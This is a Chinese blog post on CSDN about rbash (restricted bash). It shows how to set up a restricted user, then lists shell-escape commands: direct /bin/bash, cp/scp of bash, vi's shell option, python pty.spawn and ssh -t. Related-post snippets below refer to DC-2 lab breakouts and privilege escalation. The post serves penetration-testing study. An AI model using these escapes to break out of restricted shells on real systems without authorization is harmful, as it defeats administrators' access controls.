[2] rbash绕过

于 2024-09-30 08:47:41 发布
阅读量143 收藏 3
点赞数 3
分类专栏: 安全零散知识 文章标签: 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45776114/article/details/142648155
版权

简介

rbash 是 “restricted bash” 的缩写,指的是一种受限的 Bash shell。它是一种特别的 Bash shell 变体,旨在限制用户在终端中的某些操作,增加系统的安全性。使用 rbash 的主要目的是为了限制用户的能力,防止他们执行某些潜在的危险命令。rbash 限制用户只能运行在 $PATH 环境变量中定义的程序

设置rbash

# 创建一个用户
sudo adduser test
# 修改用户默认shell为rbash
sudo vim /etc/passwd
# 创建一个目录,只放入用户允许运行的命令。
mkdir /home/test/bin
ln -s /bin/ls /home/test/bin/ls
ln -s /bin/pwd /home/test/bin/pwd
ln -s /bin/clear /home/test/bin/clear
# 修改用户的 `.bashrc` 或 `.profile` 文件,设置 PATH 只指向 `/home/test/bin`:
PATH=/home/test/bin 
export PATH

1727654771346.png
验证是否设置成功:下面这是成功的结果
1727655017183.png

绕过方式

首先做信息收集:

  • 检查可用命令
  • 可用操作符
  • 检查可用的编程语言

常用绕过方式

/bin/bash直接绕过

# 如果/允许的情况,就能直接绕过了
/bin/bash

cp/scp 绕过

# 目标地址,一般用户限制终端为rbash,还是会允许一些命令存在在用户家目录下,目标地址为 允许命令存放目录
cp /bin/bash bin/
scp username@ip:/bin/bash bin/

vi/vim绕过

# 执行vi 或vim 进入编辑器
vi / vim
:shell=/bin/bash
shell

python绕过

python -c "import pty;pty.spawn('/bin/bash')"

ssh连接绕过

ssh username@IP -t "/bin/sh" or "/bin/bash"
无限码力
关注
专栏目录
rbash绕过方法总结(精)
墨痕诉清风的博客
05-11 893
枚举 Linux 环境 1) First we must to check for available commands like cd/ls/echo etc. 2) We must to check for operators like >,>>,<,|. 3) We need to check for available programming languages like perl,ruby,python etc. 4) Which commands we can run
靶机DC-2练习:通过rbash绕过获取shell,使用git命令提权
7Riven's blog
12-24 1843
1.主机发现 靶机IP地址:192.168.109.163 2.扫描目标服务版本 3.发现80端口,访问主页 访问失败 很显然,本地不解析该域名,在/etc/hosts文件中添加即可 再次刷新网页 单击首页左下角 发现flag1:出现疑似用户名cewl,登录后找下一个flag 网页其他模块未发现有效信息,接下来扫描一下后台目录 4.工具扫描后台目...
rbash绕过
weixin_43705814的博客
12-29 3348
rbash绕过 一、前言 在进行dc-2的靶场渗透时遇到了rbash受限,查阅了大佬们写的笔记了解一下原理,做一下总结好让自己更好的理解掌握。 首先我们要知道为什么要进行rbash绕过,rbash是受限的shell的一种此外还有rbash、rksh和rsh,为什么要对shell进行限制呢,有以下几个原因: 1.提高安全性,防止黑客和渗透测试人员的入侵 2.限制一些会对系统造成危害的危险命令 3.为了提高渗透测试人员的个人能力,在一些靶机上设置受限的shell让测试人员绕过拿flag 二、常见的绕过方法 2.
一种rbash绕过方法
a1_pha的博客
01-03 427
在DC-2靶场中用到。
Rbash绕过
weixin_54252904的博客
04-17 548
Rbash VI绕过 vi:set shell=/bin/sh 运行shell:shell export PATH=/usr/sbin:/usr/bin:/sbin:/bin CP绕过 cp 环境变量绕过 BASH_CMDS[a]=/bin/sh;a 注:把/bin/bash给a变量` export PATH=$PATH:/bin/ 注:将/bin 作为PATH环境变量导出 export PATH=$PATH:/usr/bin 注:将/usr/bin作为PATH环境变量导
rbash绕过及提权
qq_45654333的博客
09-18 429
1,复制一个bash,重命名为rbash2,设置用户tom登陆的shell为rbash3, 在tom用户下新建一个.bin目录存放可以执行的命令4, 通过软连接执行命令5, 编辑文件/home/$tom/.bashrc,添加export PATH=$HOME/.bin/.文件一定要以# .bashrc为首行.
rbash限制以及绕过
qq_60848021的博客
04-09 856
rbash,即受限制的 bash,其可以用作中转服务器(实际上rbash只是bash的一个软链接)。它与一般shell的区别在于会限制一些行为,让一些命令无法执行。
靶机DC-2 rbash绕过+git提权
qq_43335965的博客
04-29 171
这个靶机和DC-1一样,一共5个flag。全部拿到通关。 root@kali:/home/kali# nmap -sP 192.168.1.* 先扫一下靶机的IP地址,拿到靶机的地址为192.168.1.3。 再详细的对靶机进行扫描,尽可能多的获取靶机的信息。信息收集对于渗透测试非常重要,能否挖到漏洞往往取决于目标信息是否尽可能多的被收集。 root@kali:/home/kali# nmap ...
权限提升-Linux系统权限提升篇&Vulnhub&Rbash绕过&Docker&LXD容器&History泄漏&shell交互
siu~
04-03 1533
1、普通用户到Linux-泄漏-History 2、普通用户到Linux-限制-Rbash绕过 3、普通用户到Linux-容器-LXD&Docker 4.Linux系统提权-web/普通用户-docker逃逸&提权&shell交互 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
DC-2 靶机实战------rbash绕过、git提权、WPScan的使用
z2560088的博客
09-25 333
安装DC-2 网卡开启NAT模式 开始攻击 攻击机kali (192.168.160.0/24)使用wpscan、cewl、hydra、dirb、nmap等工具 信息搜集 nmap -sP 192.168.160.0/24 确定DC-2 IP 192.168.160.140 扫描具体开放的端口 nmap -sV 192.168.160.140 -p- -A 得知SSH开放和http开放,访问http://192.168.160.140 发现ip重定向有问题需.
DC-2 详解其中限制shell的绕过
jelly
06-21 607
靶机:DC-2 192.168.56.103 攻击机:Kali 192.168.56.1 今天就来挑战DC-2了,我也是看网上的教程才过的这关,不过其中很多过程都有自己的理解和思路。这篇笔记主要用于个人学习笔记。如果有不对之处,很欢迎大佬们教我。 探寻靶机 使用nmap先把DC-2找出来 然后具体探测开放端口,这里是默认探测常开放的1000个端口 找到80端口,在浏览器输入http://192.168.56.103发现不能连接,而且url处地址自动跳转为http://dc-2 ...
linux限制用户可用命令,如何使用rbash限制用户访问Linux系统指定命令 互联网技术圈 互联网技术圈...
06-01
可以使用 rbash(restricted bash)来限制用户访问 Linux 系统指定...需要注意的是,这种限制方式并不是绝对安全的,因为用户仍然可以使用一些 trick 来绕过限制。但是,对于一般的用户来说,这种限制方式已经足够了。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8479
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Linux实践】实验四:Shell实用功能及文件权限
Fulling的博客
09-25 756
实验内容 1、使用命令“cat /etc/named.conf”设置为别名named,然后再取消别名。 2、使用echo命令和输出重定向创建文本文件/root/nn,内容是hello,然后再使用追加重定向输入内容为word。 3、使用管道方式分页显示/etc/passwd的内容。 4、分别用文字设定法和数字设定法,对/root/ab文件设置权限,所有者为读取、写入和执行权限,同组用户为读取和写入权限,其他用户没有任何权限。 5、将文件/root/ab所有者更改为用户zhangsan。 6、将目录/root/
linux】gcc makefile
Quietcoder的博客
09-24 1116
在静态链接中,链接器(如GNU的。
linux 源代码编译
最新发布
Lxn2zh的博客
09-27 1286
有时候会在linux上下载源码包,然后进行编译成可执行的文件,这个过程需要经过configure、make、make install、make clean四个步骤。configure 为这个程序在当前的操作系统环境下选择合适的编译器和环境参数来编译该代码。make install 将已编译好的可执行文件安装到操作系统指定或默认的安装目录下。make 对程序代码进行编译操作,会将源码编译成可执行的目标文件。make clean 删除编译时临时产生的目录或文件。
9.4 Linux_I/O_访问目录、文件属性
Fresh_man111的博客
09-25 368
返回值:成功返回指向打开的目录文件的结构体指针(流指针),失败返回NULLname:目录的路径fd:文件描述符返回值:成功返回0,失败返回EOFdirp:指向目录的流指针。
Linux:共享内存】
2201_75755162的博客
09-19 804
共享内存不随着进程的结束就释放,因为共享内存不属于进程而属于操作系统,需要手动释放或者后续其它系统调用。共享内存的生命周期随内核。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值